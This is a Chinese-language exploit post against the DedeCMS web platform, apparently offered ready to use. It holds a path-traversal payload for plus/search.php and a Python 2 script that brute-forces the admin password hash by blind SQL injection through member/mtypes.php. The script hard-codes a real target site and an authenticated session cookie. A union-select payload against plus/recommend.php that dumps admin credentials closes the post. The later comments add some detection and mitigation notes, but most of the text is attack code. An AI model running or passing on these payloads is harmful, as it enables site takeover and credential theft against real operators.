直接payload一条龙服务哈
/plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0
利用前提：member 模块（会员中心）的注册功能已开放
利用脚本:
#!/usr/bin/env python
# encoding:utf-8
# Date: 2015/12/25
# Created by 独自等待
# 博客 http://www.waitalone.cn/
import re
import random
import urllib2
def Get_respone(mtype_url, mdata='', method='get'):
    """Send one HTTP request to *mtype_url* and return the raw response body.

    Args:
        mtype_url: full URL to request (path and query string included).
        mdata: POST body string; only used when method == 'post'.
        method: 'post' sends a POST with *mdata*; any other value sends a GET.

    Returns:
        The body returned by urllib2's ``.read()`` (a byte string).

    Raises:
        SystemExit: on any exception raised by urllib2 (the error is printed
        first); callers never see the original exception.

    Python 2 only (``urllib2``, ``except Exception, msg``).
    """
    headers = {
        # NOTE(review): a hard-coded, already-authenticated DedeCMS member
        # session (DedeUserID / DedeLoginTime and their __ckMd5 values) is
        # embedded here -- it is a credential checked into source and is
        # sent on every request below.  Site logs tying this session id to
        # the request bursts made by Get_hash() are a natural detection hook.
        'Cookie': 'PIDDAV253154=2019041022304518294570; FVTDAV253154=636905322478704625; PHPSESSID=thsqq6s84lc9h2sicf0sv6ir91; DedeUserID=9981; DedeUserID__ckMd5=28f81f2935375e34; DedeLoginTime=1555069244; DedeLoginTime__ckMd5=05d1ba08e4f839e5; OrdersId=e6a1UlIFCQQBAVFUAFVbAlEEBFdbWgIEUg4AAwNhGmUFUwdXUgMABwkHMyoGWlo; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1; LVTDAV253154=636906957184017134; VTSDAV253154=4; MSTSDAV253154=0; VPSDAV253154=31; SIDDAV253154=f908f9d9a2844172a8e829fa19997301; LROIDDAV253154=1000'
    }
    try:
        request = urllib2.Request(mtype_url, headers=headers)
        if method == 'post':
            # 10 s socket timeout on both branches; a hung server ends the run.
            response = urllib2.urlopen(request, data=mdata, timeout=10).read()
        else:
            response = urllib2.urlopen(request, timeout=10).read()
    except Exception, msg:
        # Any failure (DNS, HTTP error, timeout) aborts the whole program.
        print u'[X] 我擦,出错了!', msg
        raise SystemExit()
    else:
        return response
def Create_id():
    """Create a member content category so that Get_id() can find an id.

    Sends a POST to ``mtype_url + '?dopost=add'`` with a fixed
    ``mtypename=hacker&channelid=1`` body and reports success by looking for
    the literal "增加分类成功" in the response.  Reads the module-level
    ``mtype_url`` set in ``__main__``.  Returns None; the user is told to
    re-run the program afterwards.

    From a defender's view this is a state-changing write by a low-privilege
    member account -- the created category named "hacker" is a visible
    artifact in the member area and in the web server's access log.
    """
    print u'\n[!] 分类ID不存在,正在创建!'
    response = Get_respone(mtype_url + '?dopost=add', 'mtypename=hacker&channelid=1', method='post')
    if '增加分类成功' in response:
        print u'\n[!] 分类创建成功,请重新执行程序!'
    else:
        print u'\n[X] 分类创建失败,请手工创建!'
def Get_id():
    """Return the first member category id found on the mtypes page.

    Fetches the module-level ``mtype_url`` with a GET.  If the page contains
    "系统关闭了会员功能" (member centre disabled) the program exits -- that
    message is the precondition check: with the member module closed the
    rest of the script cannot run.  Otherwise the first ``mtypename[<id>]``
    field name is extracted with a regex.

    Returns:
        The id as a string, or None (implicit) when no ``mtypename[...]``
        field is present, which makes ``__main__`` call Create_id().

    Raises:
        SystemExit: when the member module is reported closed.
    """
    response = Get_respone(mtype_url)
    if '系统关闭了会员功能' in response:
        print u'会员中心关闭,漏洞不存在!'
        raise SystemExit()
    else:
        # Non-raw pattern; Python 2 keeps the unknown escapes \[ and \d as-is.
        type_reg = re.compile('mtypename\[(\d+)\]')
        idlist = type_reg.findall(response)
        # Falls through to an implicit None when idlist is empty.
        if idlist: return idlist[0]
def Get_hash(typeid):
    """Boolean-based blind SQL injection loop against member/mtypes.php.

    Args:
        typeid: category id string returned by Get_id(); it is spliced into
            the injected condition (``and mtypeid=<typeid>``).

    Behaviour visible in the code: for each of 16 positions (1..16) and each
    candidate character, one request is sent to ``mtype_url + '?dopost=save'``
    whose ``_FILES[mtypename][tmp_name][...]`` key carries the injected SQL
    and whose value is a fresh ``random.random()`` flag; the mtypes page is
    then fetched again and the position is considered solved when that flag
    string appears in it.  Presumably the save handler writes the flag into
    the category name only when the injected ``if(...)`` is true -- the
    script does not check this directly, it only looks for the flag.

    Prints progress and the recovered string; returns None.  A KeyboardInterrupt
    ends the loop early and skips the summary (the ``else:`` runs only when the
    loop finishes without an exception).

    Detection notes for defenders: up to 62 state-changing requests per
    position, all to ``/member/mtypes.php?dopost=save`` with ``_FILES[`` in
    the query string, interleaved with plain GETs of the same page, all under
    one member session -- an easy signature in access logs or a WAF.
    Mitigation is to patch the affected DedeCMS handler and close member
    registration where it is not needed (see the precondition stated above
    the script).
    """
    adminhash = ''
    # Candidate alphabet: lowercase, digits, then uppercase in keyboard order.
    md5_chars = list('abcdefghijklmnopqrstuvwxyz0123456789QWERTYUIOPLKJHGFDSAZXCVBNM')
    try:
        for i in range(1, 17):
            # A new flag per position so a hit cannot be confused with a
            # leftover value from an earlier position.
            flag = random.random()
            for j in md5_chars:
                payload_pre = "?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name]["
                payload_cent = urllib2.quote(
                    "a' and `'`.``.mtypeid or if(ascii (substr((select left(substring(pwd,4),16) from dede_admin limit 1),"
                    + str(i) + ",1))=" + str(ord(j)) + ",1,0) and mtypeid=" + str(typeid) + "#"
                )
                payload_end = "]=" + str(flag) + "&_FILES[mtypename][size]=.xxxx]"
                payload = payload_pre + payload_cent + payload_end
                # Response of the save request itself is not inspected.
                payload_res = Get_respone(mtype_url + payload)
                # print response
                # Second request: re-read the page and look for the flag value.
                match_res = Get_respone(mtype_url)
                if str(flag) in match_res:
                    print u'[!] 爷,正在爆破第 [%-2d] 位,字符为: %s' % (i, j)
                    adminhash = adminhash + j
                    break
    except KeyboardInterrupt:
        print u'[!] 爷,按您的吩咐,已成功退出!'
    else:
        if adminhash == '':
            print u'[X] 爷,杯具了,漏洞不存在!'
        else:
            print u'\n[¤] 爷,爆破完毕!密码为:', adminhash
if __name__ == '__main__':
    # Module-level global read by Get_respone/Create_id/Get_id/Get_hash;
    # the target is hard-coded rather than taken from argv.
    mtype_url = 'http://www.13sr.com/member/mtypes.php'
    typeid = Get_id()
    if typeid is None:
        # No category yet: create one and ask the user to re-run.
        Create_id()
    else:
        Get_hash(typeid)
payload:http://baidu.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'or mid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`limit+0,1),5,6,7,8,9%23@`\'`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111